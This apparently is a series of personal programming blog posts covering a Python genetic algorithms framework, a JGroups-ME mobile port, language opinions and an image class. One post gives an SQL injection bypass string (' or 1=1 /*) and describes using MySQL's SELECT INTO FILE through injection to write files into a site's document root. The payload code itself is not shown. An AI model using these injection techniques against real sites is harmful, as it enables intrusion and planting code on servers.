who needs social life when you have broadband?

Hello, this is my redemption post since the long time without activity on the blog. I’m working on complete Python genetic algorithms framework with many features, for a while is still under development, but there is an alpha version and some examples at the Google project hosting.

I’m doing the best efforts to release new versions soon as possible; I hope that this project will be used, since there are not good frameworks of GAs with easy use fashion in languages like Python.

http://code.google.com/p/pyevolve/

- Perone

Today I’ve finished migrating JGroups-ME to version 2.4.1sp4 of JGroups. I’ve also finished porting the GossipRouter (created a MobileGossipRouter midlet that initializes it) and now we have a 100% mobile group communication toolkit which allows the creation of group communication systems for mobile computing!

Next step is to implement Bluetooth support (I’ll do this just after I finish writing my paper about JGroups-ME) and submit my version to the JGroups project so they can take a look and (maybe) commit to the official JGroups-ME version.

more on this subject soon. please stay tunned ;P

There are some tragic yet very interesting stuff happening to me.

As my undergrad project involves creating a group communication mechanism for mobile devices, I’m trying to become a Java programmer. I’ve never liked Java and you probably already know that. I don’t like it because it is slow and has too many fancy names for simple stuff (I guess this is just to increase the learning curve so Sun partners can sell more courses…). BUT, programming in JavaME is forcing me to practice/remember/learn a lot of techniques and algorithms I’ve never though I would need. So I’m almost saying that it is exciting to program in java (for mobile devices!! the standard edition still sux a lot).

I’m a programmer since I was 15 (7yrs ago), I started with mIRC Scripting (good times..) then I’ve learned PHP, C (in college.. I’ve used it professionally only once, to develop a socket client-server application), Java and Python (which I use just for fun…) in that order. Although I don’t consider myself a good programmer, I can say I’m proficient in PHP (it’s been 5yrs now since I wrote my first mysql_fetch_array() snippet :P). The fact is that, except for C, all these languages give you so much build-in features and facilities that you forget some basic principles of programming.

I would dare to say that it is impossible to become a good programmer if you only know how to program in PHP, for example (and “writing applications that work”, doesn’t make you a good programmer), because it makes programming too easy and too fast. You boss will like it and if you need some simple applications this is good enough, but if you learn PHP as a 1st language you probably won’t know how to optimize your code or will get crazy when you face more complex situations.

Even these JavaEE devs who think they are better than the rest of humanity should try to learn some “low level” algorithms (such as binary trees, linked lists, sockets, threading internals, schedule, etecetera) because learning how to use an API is pretty easy compared to how to implement these APIs

I’m not against PHP or Python and its classes/modules that make our life easier. I’m just concerned about learning how to use this stuff without knowing how they were made…

Here are my conclusions:
- There are languages that make you a faster programmer (or not)
- There are languages that make you a better programmer (or not)
- If I would need to choose between a JavaME and a JavaSE/JavaEE programmer I would definitely choose the JavaME programmer because he *should* write a more efficient code. And it is easier to teach someone how to use an API than teach someone how to implement a serialization mechanism and send objects through the network.
- I’m a terrible english wirter I’m considering start blogging in portuguese…

We all know SQL Injection and a bunch of techniques to exploit this... I've decided to blog about a "new" one. Please don't consider this as "advanced sql injection" because its not

MySQL is a great database management system and it allows you to do many things with the "select" statement, wouldn't it be TOO many things?

I guess everyone knows the basic "' or 1=1 /*" an its variants... but accessing restricted areas, changing user infos and dropping tables aren't the only cool stuff you can do with sql injections.

There is a feature that allows you to save your select into a file. It's called SELECT INTO FILE (duh!) and things can get pretty dangerous if you use it with a sql injection.

Isn't it clear enough yet? Ok, let me try to help you get the big picture.

what if someone inserts this code:

please notice that you'll need to know the documentroot path but this shouldn't be a problem with vulnerable php systems.

Well, I'm not intended to give you a cookbook and promote n00bism. So, if you still didn't figure out how to take advantage of this, you probably shouldn't use it. Google might help you as well

happy hacking.

PS: syntax errors were generated on purpose.

Rember when I said I've found the best image generator class? It turned out that this class isn't everything I said previously. Actually it promises a lot of stuff, but still have too many bugs (for example, you cannot create a simple png with transparent background and I've also had trouble centralizing my text).

At least this class was well written and has been easy to customize.